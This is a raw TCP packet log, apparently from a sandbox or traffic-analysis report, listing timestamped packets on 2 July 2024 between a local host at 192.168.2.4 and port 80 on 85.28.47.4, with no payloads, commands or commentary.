                                            Jul 2, 2024 08:26:21.664419889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.664958000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664985895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.664997101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665007114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665044069 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665152073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665163040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665173054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665183067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665199995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665226936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665322065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665332079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665363073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665393114 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665889978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665935993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.665945053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665956974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.665982962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.666002035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.666153908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.666166067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.666174889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.666186094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.666199923 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.666223049 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.666234970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.666277885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.730359077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.730381966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.730392933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.730479002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.730485916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.730492115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.730536938 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.736797094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.736808062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.736818075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.736861944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.736872911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.736958981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.736969948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.736979008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.737008095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.737030029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.737138033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.737149000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.737158060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.737186909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.737210035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.737276077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.737323046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743283987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743334055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743339062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743345976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743375063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743454933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743464947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743505955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743568897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743580103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743629932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743699074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743709087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743719101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743729115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743738890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743747950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743751049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743757963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743761063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.743782997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743805885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.743976116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744002104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744024038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744046926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744102955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744115114 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744126081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744153023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744174957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744194984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744237900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744266033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744309902 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744374037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744385004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744395971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744421005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744443893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744513988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744525909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744560957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744568110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744613886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744618893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744628906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744657993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744785070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744796038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744806051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.744832993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.744847059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.749722958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749773979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749777079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.749785900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749809027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749809980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.749825001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.749841928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.749855042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749898911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.749958038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749969959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.749980927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750005960 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750031948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750183105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750194073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750204086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750215054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750226021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750231981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750237942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750247955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750257015 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750277996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750513077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750524044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750535011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750545979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750555038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750580072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750766993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750828028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750830889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750838995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750865936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.750937939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750952005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750962019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750972986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.750993013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751003027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751102924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751151085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751297951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751307964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751319885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751329899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751339912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751344919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751352072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751363039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751367092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751374006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751389980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751401901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751430035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751607895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751651049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751656055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751662016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751692057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751795053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751805067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751815081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751827002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.751841068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751854897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.751996994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752007961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752017975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752028942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752055883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752065897 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752188921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752199888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752209902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752239943 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752250910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752393007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752440929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752460003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752470970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752521038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752543926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752554893 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752572060 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752592087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752749920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752768040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752778053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752798080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752820969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752897024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752907038 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752918005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.752943993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.752960920 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.753078938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753089905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753099918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753110886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753129959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.753150940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.753258944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753273964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753313065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.753343105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753391027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.753411055 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753422022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.753463030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.825656891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825725079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825738907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825795889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.825824976 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.825854063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825865030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825875044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825884104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825892925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.825898886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.825925112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.825933933 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832187891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832201958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832212925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832242966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832273960 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832281113 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832292080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832302094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832320929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832349062 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832698107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832709074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832720041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832731962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832742929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832747936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832753897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832772017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832791090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832806110 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832843065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832849026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832884073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.832961082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832972050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.832983017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833010912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833034039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833098888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833139896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833189011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833200932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833213091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833224058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833234072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833237886 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833245993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833261967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833277941 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833301067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833679914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833692074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833704948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833714962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833729982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833754063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833827019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833837986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833848953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.833873034 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.833883047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.834055901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.834068060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.834078074 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.834089041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.834099054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.834101915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.834125042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.834146023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.838660955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.838717937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.838891029 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.838901043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.838912010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.838922024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.838931084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.838937998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.838964939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.838984013 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.838990927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839001894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839011908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839026928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839039087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839139938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839149952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839184999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839483976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839493990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839504957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839514017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839524031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839533091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839534998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839545965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839550018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839571953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839584112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839622021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839632034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839641094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839651108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839668036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839693069 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839835882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839844942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839857101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839865923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839875937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.839879990 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839905977 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.839935064 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840023041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840034962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840044022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840066910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840087891 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840215921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840224981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840235949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840250015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840261936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:21.840265989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840276003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840286970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:21.840289116 CEST6388080192.168.2.485.28.47.4
